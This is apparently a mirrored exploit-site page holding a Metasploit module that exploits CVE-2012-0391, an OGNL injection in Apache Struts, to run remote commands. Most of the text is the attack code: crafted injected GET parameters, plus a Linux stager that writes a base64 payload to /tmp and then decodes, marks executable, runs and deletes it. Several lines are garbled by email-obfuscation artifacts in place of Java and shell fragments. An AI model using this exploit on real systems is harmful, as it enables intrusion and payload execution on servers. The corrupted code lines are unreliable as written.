Apache Struts 2.2.1.1 Remote Command Execution

2012-06-0500:00:00
metasploit
0day.today
EPSS
0.186
Percentile
96.3%
JSON
Exploit for windows platform in category remote exploits
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts <= 2.2.1.1 Remote Command Execution',
      'Description'    => %q{
          This module exploits a remote command execution vulnerability in
        Apache Struts versions < 2.2.1.1. This issue is caused because the
        ExceptionDelegator interprets parameter values as OGNL expressions
        during certain exception handling for mismatched data types of properties,
        which allows remote attackers to execute arbitrary Java code via a
        crafted parameter.
      },
      'Author'         =>
        [
          'Johannes Dahse', # Vulnerability discovery and PoC
          'Andreas Nusser', # Vulnerability discovery and PoC
          'juan vazquez', # Metasploit module
          'sinn3r' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'CVE', '2012-0391'],
          [ 'OSVDB', '78277'],
          [ 'EDB', '18329'],
          [ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
        ],
      'Platform'      => [ 'win', 'linux'],
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows Universal',
            {
                'Arch' => ARCH_X86,
                'Platform' => 'win'
            }
          ],
          ['Linux Universal',
            {
                'Arch' => ARCH_X86,
                'Platform' => 'linux'
            }
          ],
        ],
      'DisclosureDate' => 'Jan 06 2012',
      'DefaultTarget' => 0))

      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
          OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
        ], self.class)
  end

  def execute_command(cmd, opts = {})

    uri = String.new(datastore['TARGETURI'])
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@[email protected]().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@[email protected]().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
    uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

    vprint_status("Attempting to execute: #{cmd}")

    resp = send_request_raw({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
    }, 5)

  end

  def windows_stager
    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    execute_cmdstager({ :temp => '.'})
    @payload_exe = payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  def linux_stager
    cmds = "/bin/[email protected]@echo LINE | tee FILE"
    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    base64 = Rex::Text.encode_base64(exe)
    base64.gsub!(/\=/, "\\u003d")
    file = rand_text_alphanumeric(4+rand(4))

    execute_command("/bin/[email protected]@touch /tmp/#{file}.b64")
    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
    base64.each_line do |line|
      line.chomp!
      cmd = cmds
      cmd.gsub!(/LINE/, line)
      execute_command(cmds)
    end

    execute_command("/bin/[email protected]@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
    execute_command("/bin/[email protected]@chmod +x /tmp/#{file}")
    execute_command("/bin/[email protected]@rm /tmp/#{file}.b64")

    execute_command("/bin/[email protected]@/tmp/#{file}")
    @payload_exe = "/tmp/" + file
  end

  def on_new_session(client)
    if target['Platform'] == 'linux'
      print_status("Deleting #{@payload_exe} payload file")
      execute_command("/bin/[email protected][email protected] #{@payload_exe}")
    else
      print_status("Windows does not allow running executables to be deleted")
      print_status("Delete the #{@payload_exe} file manually after migrating")
    end
  end

  def exploit
    if not datastore['CMD'].empty?
      print_status("Executing user supplied command")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
      when 'linux'
        linux_stager
      when 'win'
        windows_stager
      else
        raise RuntimeError, 'Unsupported target platform!'
    end

    handler
  end
end



#  0day.today [2018-04-12]  #